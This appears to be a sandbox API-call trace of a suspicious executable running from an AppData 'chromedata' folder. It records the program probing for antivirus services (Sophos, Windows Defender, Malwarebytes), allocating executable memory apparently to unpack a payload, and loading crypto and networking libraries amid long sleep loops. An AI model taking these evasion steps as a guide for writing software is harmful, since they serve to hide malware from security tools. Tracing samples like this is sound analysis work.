	[0066.425] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8b00*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.425] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.425] Sleep (dwMilliseconds=0x1) 
	[0066.441] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8b90*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.441] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.441] Sleep (dwMilliseconds=0x1) 
	[0066.457] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8c20*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.457] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.457] Sleep (dwMilliseconds=0x1) 
	[0066.472] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8d30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.473] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.473] Sleep (dwMilliseconds=0x1) 
	[0066.488] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8dc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.488] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.488] Sleep (dwMilliseconds=0x1) 
	[0066.503] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8e50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.503] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.503] Sleep (dwMilliseconds=0x1) 
	[0066.519] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8ee0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.519] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.519] Sleep (dwMilliseconds=0x1) 
	[0066.535] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b8f70*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.535] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.535] Sleep (dwMilliseconds=0x1) 
	[0066.550] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9000*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.550] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.550] Sleep (dwMilliseconds=0x1) 
	[0066.567] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9090*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.567] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.567] Sleep (dwMilliseconds=0x1) 
	[0066.581] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9120*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.581] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.581] Sleep (dwMilliseconds=0x1) 
	[0066.597] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b91b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.597] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.597] Sleep (dwMilliseconds=0x1) 
	[0066.613] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9240*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.613] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.613] Sleep (dwMilliseconds=0x1) 
	[0066.628] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b92d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.628] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.628] Sleep (dwMilliseconds=0x1) 
	[0066.644] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9360*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.644] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.644] Sleep (dwMilliseconds=0x1) 
	[0066.659] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b93f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.659] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.659] Sleep (dwMilliseconds=0x1) 
	[0066.675] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9480*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.675] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.675] Sleep (dwMilliseconds=0x1) 
	[0066.690] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9510*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.691] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.691] Sleep (dwMilliseconds=0x1) 
	[0066.707] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b95a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.707] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.707] Sleep (dwMilliseconds=0x1) 
	[0066.722] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9630*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.722] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.722] Sleep (dwMilliseconds=0x1) 
	[0066.737] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b96c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.738] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.738] Sleep (dwMilliseconds=0x1) 
	[0066.761] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9750*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.761] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.761] Sleep (dwMilliseconds=0x1) 
	[0066.769] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b97e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.769] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.769] Sleep (dwMilliseconds=0x1) 
	[0066.784] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9870*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.784] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0066.784] Sleep (dwMilliseconds=0x1) 
	[0066.800] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1b9900*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0066.800] GetSystemDirectoryW (in: lpBuffer=0x12ae2c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0066.800] GetProcessHeap () returned 0x150000
	[0066.800] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x16) returned 0x1937a8
	[0066.800] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x19ca60
	[0066.803] OpenServiceW (hSCManager=0x19ca60, lpServiceName="SAVService", dwDesiredAccess=0x4) returned 0x0
	[0066.803] CloseServiceHandle (hSCObject=0x19ca60) returned 1
	[0066.804] GetProcessHeap () returned 0x150000
	[0066.804] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x14) returned 0x193668
	[0066.804] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x19ca60
	[0066.804] OpenServiceW (hSCManager=0x19ca60, lpServiceName="WinDefend", dwDesiredAccess=0x4) returned 0x0
	[0066.804] CloseServiceHandle (hSCObject=0x19ca60) returned 1
	[0066.804] GetProcessHeap () returned 0x150000
	[0066.804] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x18) returned 0x193768
	[0066.804] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x19ca60
	[0066.804] OpenServiceW (hSCManager=0x19ca60, lpServiceName="MBAMService", dwDesiredAccess=0x4) returned 0x0
	[0066.805] CloseServiceHandle (hSCObject=0x19ca60) returned 1
	[0066.805] GetNativeSystemInfo (in: lpSystemInfo=0x12b018 | out: lpSystemInfo=0x12b018*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0066.805] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12aba4, nSize=0x104 | out: lpFilename="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe")) returned 0x3d
	[0066.805] GetProcessHeap () returned 0x150000
	[0066.805] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x18) returned 0x193368
	[0066.805] GetCurrentProcess () returned 0xffffffff
	[0066.805] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12a718 | out: TokenHandle=0x12a718*=0xb0) returned 1
	[0066.805] GetTokenInformation (in: TokenHandle=0xb0, TokenInformationClass=0x1, TokenInformation=0x12a71c, TokenInformationLength=0x4c, ReturnLength=0x12a704 | out: TokenInformation=0x12a71c, ReturnLength=0x12a704) returned 1
	[0066.805] AllocateAndInitializeSid (in: pIdentifierAuthority=0x12a710, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12a70c | out: pSid=0x12a70c*=0x19daa8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
	[0066.805] EqualSid (pSid1=0x12a724*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), pSid2=0x19daa8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0
	[0066.805] CloseHandle (hObject=0xb0) returned 1
	[0066.805] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x12a78c | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming") returned 0x0
	[0066.807] lstrcmpiW (lpString1="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming", lpString2="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming") returned 0
	[0066.807] VirtualAlloc (lpAddress=0x0, dwSize=0x17e00, flAllocationType=0x3000, flProtect=0x40) returned 0x1a50000
	[0066.809] VirtualAlloc (lpAddress=0x400000, dwSize=0x19000, flAllocationType=0x2000, flProtect=0x40) returned 0x0
	[0066.809] VirtualAlloc (lpAddress=0x0, dwSize=0x19000, flAllocationType=0x2000, flProtect=0x40) returned 0x1a70000
	[0066.809] GetCurrentProcess () returned 0xffffffff
	[0066.809] VirtualAlloc (lpAddress=0x1a70000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x1a70000
	[0066.810] VirtualAlloc (lpAddress=0x1a71000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x1a71000
	[0066.811] VirtualAlloc (lpAddress=0x1a85000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x40) returned 0x1a85000
	[0066.812] VirtualAlloc (lpAddress=0x1a87000, dwSize=0xa00, flAllocationType=0x1000, flProtect=0x40) returned 0x1a87000
	[0066.812] VirtualAlloc (lpAddress=0x1a88000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x40) returned 0x1a88000
	[0066.821] VirtualProtect (in: lpAddress=0x1a71000, dwSize=0x13f00, flNewProtect=0x20, lpflOldProtect=0x12a778 | out: lpflOldProtect=0x12a778*=0x40) returned 1
	[0066.822] VirtualProtect (in: lpAddress=0x1a85000, dwSize=0x1f90, flNewProtect=0x4, lpflOldProtect=0x12a778 | out: lpflOldProtect=0x12a778*=0x40) returned 1
	[0066.822] VirtualProtect (in: lpAddress=0x1a87000, dwSize=0x8a8, flNewProtect=0x2, lpflOldProtect=0x12a778 | out: lpflOldProtect=0x12a778*=0x40) returned 1
	[0066.822] VirtualProtect (in: lpAddress=0x1a88000, dwSize=0x1d8, flNewProtect=0x2, lpflOldProtect=0x12a778 | out: lpflOldProtect=0x12a778*=0x40) returned 1
	[0066.822] GetProcessHeap () returned 0x150000
	[0066.822] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x18) returned 0x1936c8
	[0066.822] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x1936c8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x1936c8, ReturnLength=0x0) returned 0x0
	[0066.822] VirtualProtect (in: lpAddress=0x1a70000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x12a778 | out: lpflOldProtect=0x12a778*=0x4) returned 1
	[0066.824] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHLWAPI.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x771d0000) returned 0x0
	[0066.824] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="CRYPT32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x75610000) returned 0x0
	[0066.824] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="bcrypt.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x75080000) returned 0x0
	[0066.908] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USER32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x76c00000) returned 0x0
	[0066.908] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WINHTTP.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x719a0000) returned 0x0
	[0067.303] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WS2_32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x75a90000) returned 0x0
	[0067.306] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="OLEAUT32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x76a60000) returned 0x0
	[0067.306] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USERENV.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x74b30000) returned 0x0
	[0067.306] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ncrypt.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x750a0000) returned 0x0
	[0067.554] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x774c0000) returned 0x0
	[0067.554] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="IPHLPAPI.DLL", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x73e70000) returned 0x0
	[0067.823] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHELL32.dll", BaseAddress=0x12973c | out: BaseAddress=0x12973c*=0x75bb0000) returned 0x0
	[0067.823] GetLastError () returned 0x0
	[0067.823] Sleep (dwMilliseconds=0x1) 
	[0067.829] GetLastError () returned 0x0
	[0067.829] Sleep (dwMilliseconds=0x1) 
	[0067.845] GetLastError () returned 0x0
	[0067.845] Sleep (dwMilliseconds=0x1) 
	[0067.861] GetLastError () returned 0x0
	[0067.861] Sleep (dwMilliseconds=0x1) 
	[0067.876] GetLastError () returned 0x0
	[0067.876] Sleep (dwMilliseconds=0x1) 
	[0067.892] GetLastError () returned 0x0
	[0067.892] Sleep (dwMilliseconds=0x1) 
	[0067.907] GetLastError () returned 0x0
	[0067.907] Sleep (dwMilliseconds=0x1) 
	[0067.923] GetLastError () returned 0x0
	[0067.923] Sleep (dwMilliseconds=0x1) 
	[0067.939] GetLastError () returned 0x0
	[0067.939] Sleep (dwMilliseconds=0x1) 
	[0067.954] GetLastError () returned 0x0
	[0067.954] Sleep (dwMilliseconds=0x1) 
	[0067.970] GetLastError () returned 0x0
	[0067.970] Sleep (dwMilliseconds=0x1) 
	[0067.986] GetLastError () returned 0x0
	[0067.986] Sleep (dwMilliseconds=0x1) 
	[0068.001] GetLastError () returned 0x0
	[0068.001] Sleep (dwMilliseconds=0x1) 
	[0068.017] GetLastError () returned 0x0
	[0068.017] Sleep (dwMilliseconds=0x1) 
	[0068.032] GetLastError () returned 0x0
	[0068.032] Sleep (dwMilliseconds=0x1) 
	[0068.048] GetLastError () returned 0x0
	[0068.048] Sleep (dwMilliseconds=0x1) 
	[0068.064] GetLastError () returned 0x0
	[0068.064] Sleep (dwMilliseconds=0x1) 
	[0068.087] GetLastError () returned 0x0
	[0068.087] Sleep (dwMilliseconds=0x1) 
	[0068.094] GetLastError () returned 0x0
	[0068.094] Sleep (dwMilliseconds=0x1) 
	[0068.110] GetLastError () returned 0x0
	[0068.110] Sleep (dwMilliseconds=0x1) 
	[0068.126] GetLastError () returned 0x0
	[0068.126] Sleep (dwMilliseconds=0x1) 
	[0068.141] GetLastError () returned 0x0
	[0068.141] Sleep (dwMilliseconds=0x1) 
	[0068.157] GetLastError () returned 0x0
	[0068.157] Sleep (dwMilliseconds=0x1) 
	[0068.173] GetLastError () returned 0x0
	[0068.173] Sleep (dwMilliseconds=0x1) 
	[0068.188] GetLastError () returned 0x0
	[0068.188] Sleep (dwMilliseconds=0x1) 
	[0068.204] GetLastError () returned 0x0
	[0068.204] Sleep (dwMilliseconds=0x1) 
	[0068.219] GetLastError () returned 0x0
	[0068.219] Sleep (dwMilliseconds=0x1) 
	[0068.235] GetLastError () returned 0x0
	[0068.235] Sleep (dwMilliseconds=0x1) 
	[0068.251] GetLastError () returned 0x0
	[0068.251] Sleep (dwMilliseconds=0x1) 
	[0068.266] GetLastError () returned 0x0
	[0068.266] Sleep (dwMilliseconds=0x1) 
	[0068.282] GetLastError () returned 0x0
	[0068.282] Sleep (dwMilliseconds=0x1) 
	[0068.297] GetLastError () returned 0x0
	[0068.297] Sleep (dwMilliseconds=0x1) 
	[0068.313] GetLastError () returned 0x0
	[0068.313] Sleep (dwMilliseconds=0x1) 
	[0068.329] GetLastError () returned 0x0
	[0068.329] Sleep (dwMilliseconds=0x1) 
	[0068.344] GetLastError () returned 0x0
	[0068.344] Sleep (dwMilliseconds=0x1) 
	[0068.360] GetLastError () returned 0x0
	[0068.360] Sleep (dwMilliseconds=0x1) 
	[0068.375] GetLastError () returned 0x0
	[0068.375] Sleep (dwMilliseconds=0x1) 
	[0068.391] GetLastError () returned 0x0
	[0068.391] Sleep (dwMilliseconds=0x1) 
	[0068.407] GetLastError () returned 0x0
	[0068.407] Sleep (dwMilliseconds=0x1) 
	[0068.422] GetLastError () returned 0x0
	[0068.422] Sleep (dwMilliseconds=0x1) 
	[0068.438] GetLastError () returned 0x0
	[0068.438] Sleep (dwMilliseconds=0x1) 
	[0068.453] GetLastError () returned 0x0
	[0068.453] Sleep (dwMilliseconds=0x1) 
	[0068.471] GetLastError () returned 0x0
	[0068.471] Sleep (dwMilliseconds=0x1) 
	[0068.485] GetLastError () returned 0x0
	[0068.485] Sleep (dwMilliseconds=0x1) 
	[0068.500] GetLastError () returned 0x0
	[0068.500] Sleep (dwMilliseconds=0x1) 
	[0068.516] GetLastError () returned 0x0
	[0068.516] Sleep (dwMilliseconds=0x1) 
	[0068.531] GetLastError () returned 0x0
	[0068.531] Sleep (dwMilliseconds=0x1) 
	[0068.547] GetLastError () returned 0x0
	[0068.547] Sleep (dwMilliseconds=0x1) 
	[0068.562] GetLastError () returned 0x0
	[0068.563] Sleep (dwMilliseconds=0x1) 
	[0068.578] GetLastError () returned 0x0
	[0068.578] Sleep (dwMilliseconds=0x1) 
	[0068.594] GetLastError () returned 0x0
	[0068.594] Sleep (dwMilliseconds=0x1) 
	[0068.609] GetLastError () returned 0x0
	[0068.609] Sleep (dwMilliseconds=0x1) 
	[0068.625] GetLastError () returned 0x0
	[0068.625] Sleep (dwMilliseconds=0x1) 
	[0068.641] GetLastError () returned 0x0
	[0068.641] Sleep (dwMilliseconds=0x1) 
	[0068.656] GetLastError () returned 0x0
	[0068.656] Sleep (dwMilliseconds=0x1) 
	[0068.672] GetLastError () returned 0x0
	[0068.672] Sleep (dwMilliseconds=0x1) 
	[0068.687] GetLastError () returned 0x0
	[0068.687] Sleep (dwMilliseconds=0x1) 
	[0068.703] GetLastError () returned 0x0
	[0068.703] Sleep (dwMilliseconds=0x1) 
	[0068.718] GetLastError () returned 0x0
	[0068.718] Sleep (dwMilliseconds=0x1) 
	[0068.734] GetLastError () returned 0x0
	[0068.734] Sleep (dwMilliseconds=0x1) 
	[0068.750] GetLastError () returned 0x0
	[0068.750] Sleep (dwMilliseconds=0x1) 
	[0068.765] GetLastError () returned 0x0
	[0068.765] Sleep (dwMilliseconds=0x1) 
	[0068.781] GetLastError () returned 0x0
	[0068.781] Sleep (dwMilliseconds=0x1) 
	[0068.796] GetLastError () returned 0x0
	[0068.797] Sleep (dwMilliseconds=0x1) 
	[0068.814] GetLastError () returned 0x0
	[0068.814] Sleep (dwMilliseconds=0x1) 
	[0068.828] GetLastError () returned 0x0
	[0068.828] Sleep (dwMilliseconds=0x1) 
	[0068.844] GetLastError () returned 0x0
	[0068.844] Sleep (dwMilliseconds=0x1) 
	[0068.861] GetLastError () returned 0x0
	[0068.861] Sleep (dwMilliseconds=0x1) 
	[0068.879] GetLastError () returned 0x0
	[0068.879] Sleep (dwMilliseconds=0x1) 
	[0068.890] GetLastError () returned 0x0
	[0068.890] Sleep (dwMilliseconds=0x1) 
	[0068.906] GetLastError () returned 0x0
	[0068.906] Sleep (dwMilliseconds=0x1) 
	[0068.922] GetLastError () returned 0x0
	[0068.922] Sleep (dwMilliseconds=0x1) 
	[0068.946] GetLastError () returned 0x0
	[0068.946] Sleep (dwMilliseconds=0x1) 
	[0068.953] GetLastError () returned 0x0
	[0068.953] Sleep (dwMilliseconds=0x1) 
	[0068.968] GetLastError () returned 0x0
	[0068.968] Sleep (dwMilliseconds=0x1) 
	[0068.984] GetLastError () returned 0x0
	[0068.984] Sleep (dwMilliseconds=0x1) 
	[0068.999] GetLastError () returned 0x0
	[0068.999] Sleep (dwMilliseconds=0x1) 
	[0069.015] GetLastError () returned 0x0
	[0069.015] Sleep (dwMilliseconds=0x1) 
	[0069.031] GetLastError () returned 0x0
	[0069.031] Sleep (dwMilliseconds=0x1) 
	[0069.047] GetLastError () returned 0x0
